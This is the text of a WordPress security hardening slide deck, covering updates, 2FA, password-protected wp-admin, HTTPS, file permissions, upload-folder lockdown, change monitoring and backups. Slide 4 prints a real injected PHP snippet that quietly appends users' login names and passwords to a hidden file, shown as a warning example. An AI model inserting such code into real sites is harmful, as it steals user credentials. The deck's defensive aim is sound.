Patterns for automating API delivery. API conferencePatterns for automating API delivery. API conference
Patterns for automating API delivery. API conference
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 
VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024VictoriaMetrics Anomaly Detection Updates: Q1 2024
VictoriaMetrics Anomaly Detection Updates: Q1 2024
 
Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...
Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...
Tech Tuesday Slides - Introduction to Project Management with OnePlan's Work ...
 
JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...
JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...
JavaLand 2024 - Going serverless with Quarkus GraalVM native images and AWS L...
 

Securing Your WordPress Installation

  • 1. Security How to Secure Your WordPress
  • 2. About Me • WordPress Plugins Developer – Since 2003 – Created > 22 plugins • wp-pagenavi, wp-polls, wp-postratings, wp-postviews, wp-dbmanager, etc • http://profiles.wordpress.org/gamerz • Tech Guy in Tech in Asia – Just started on 1st September 2014 – Tech in Asia is still hiring & you can join my team • techinasia.com/join • PHP & iOS Developer Lester Chan (@gamerz) [ 2 ]
  • 3. WordPress Is Popular • Power 22% of the web • Most blogs uses WordPress – Mashable.com – Techcrunch.com • Because it is popular, lots of attacks are being targeted at WordPress sites Lester Chan (@gamerz) [ 3 ]
  • 4. Hack Attempts • wp-includes/users.php – $fh = fopen(ABSPATH . "core/wp-content/ plugins/.htaccess","a+"); – fwrite($fh,$credentials['user_login'] . ':' . $credentials['user_password'] . "n"); – fclose($fh); • Backdoor files Lester Chan (@gamerz) [ 4 ]
  • 5. Security 101 • Always keep your WordPress & it’s plugins up to date. – 4th September 2014 • WordPress 4.0 – 6th August 2014 • WordPress 3.9.2 was released to fix: – Fixes a possible but unlikely code execution when processing widgets – Prevents information disclosure via XML entity attacks in the external GetID3 library – Adds protections against brute attacks against CSRF tokens – Contains some additional security hardening, like preventing cross-site scripting that could be triggered only by administrators. Lester Chan (@gamerz) [ 5 ]
  • 6. Passwords • Use a complex password – In general • Not just WordPress but your CPanel/FTP as well • Use a 2FA plugin – Google Authenticator • https://wordpress.org/plugins/google-authenticator/ – Authy Two Factor Authentication • https://wordpress.org/plugins/authy-two- factor-authentication/ Lester Chan (@gamerz) [ 6 ]
  • 7. Passwords • Protect your WP-Admin with a password – Using htpasswd • http://www.htaccesstools.com/htpasswd-generator/ – Placing .htaccess in wp-admin ErrorDocument 401 default AuthName "Lester Chan's Website WordPress Admin" AuthUserFile "/home/gamerz/wp-admin/passwd" AuthType Basic require valid-user <Files admin-ajax.php> Order allow,deny Allow from all Satisfy any </Files> Lester Chan (@gamerz) [ 7 ]
  • 8. HTTPS • HTTPS encrypts communication and sensitive data between the browser and wp-admin. • Prevents man in the middle attacks. – define('FORCE_SSL_LOGIN', true); – define('FORCE_SSL_ADMIN', true); Lester Chan (@gamerz) [ 8 ]
  • 9. Files/Folder Permissions • Files & folder should be only readable & writeable only by the owner and readable by the rest • Ensure all files are CHMOD to 644 – find . -type f -exec chmod 644 {} ; • Ensure all folders are CHMOD to 755 – find . -type d -exec chmod 755 {} ; Lester Chan (@gamerz) [ 9 ]
  • 10. WordPress Uploads • /wp-content/uploads/ – Is a common vector for attacks because it store user uploaded files – Harder to notice – Most people will just CHMOD this to 777 • Which means everyone can read & write to it – This folder should only serve static assets & not execute any scripts • http://stackoverflow.com/questions/18932756/disable-all- cgi-php-perl-for-a-directory-using-htaccess Lester Chan (@gamerz) [ 10 ]
  • 11. Monitor Changed Files • I monitor my site changed files via email on a daily basis • Using CRON – find /home/gamerz/public_html -mtime -1 Lester Chan (@gamerz) [ 11 ]
  • 12. Using Git • /core/ – Contains a Git checkout of https://github.com/WordPress/WordPress – git fetch --tags; git checkout 4.0 • /content/ – It is a Git checkout of my private repository – Contains all my active plugins and themes • Doing a git status on any folder above will also tell me what has changed Lester Chan (@gamerz) [ 12 ]
  • 13. Backup • Backup your database regularly – Every hour if you blog more than once a day – Every day if you blog regularly – Using a plugin like WP-DBManager • https://wordpress.org/plugins/wp-dbmanager/ • Backup your /uploads/ folder – Using Git? (not ideal) – FTP to S3/Dropbox? – NAS – Gluster FS Lester Chan (@gamerz) [ 13 ]
  • 14. VaultPress • https://vaultpress.com/ – By Automattic • Company behind WordPress.com – Paid • Lite (USD$55/year), Basic (USD$165/year), Premium (USD$440/year) – Features • Realtime full (database + files) backup • Scanning your site for dangerous files • Automatic restore of database + files Lester Chan (@gamerz) [ 14 ]
  • 15. Summary • Password Protected WP-Admin • Use Google Authenticator as 2FA login for WordPress • HTTPS for WP-Admin • Ensure all file are CHMOD to 644 and folders to 755 • Do not allow any script execution in /uploads/ folder • Monitor your site changed files • Backup your database regularly Lester Chan (@gamerz) [ 15 ]
  • 16. Other References • http://codex.wordpress.org/Hardening_Word Press • http://codex.wordpress.org/Backing_Up_Your _WordPress_Files • http://wordpress.tv/tag/security/ Lester Chan (@gamerz) [ 16 ]
  • 17. Questions? • Any questions? • You can also find me at – Blog: http://lesterchan.net – Twitter: @gamerz – Facebook: https://fb.com/lesterchan – Instagram: @gamerz Lester Chan (@gamerz) [ 17 ]